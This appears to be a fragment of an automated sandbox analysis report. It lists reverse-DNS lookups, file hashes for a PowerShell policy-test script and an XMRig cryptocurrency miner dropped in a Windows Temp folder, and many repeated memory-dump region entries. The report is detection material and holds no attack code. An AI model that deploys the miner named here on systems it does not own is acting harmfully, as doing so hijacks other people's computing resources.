US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lxq30kwp.xb0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3


memory/4276-102-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-103-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-104-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-105-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-106-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-107-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-108-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-109-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-110-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-111-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-112-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-113-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-114-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-115-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-116-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-117-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-118-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp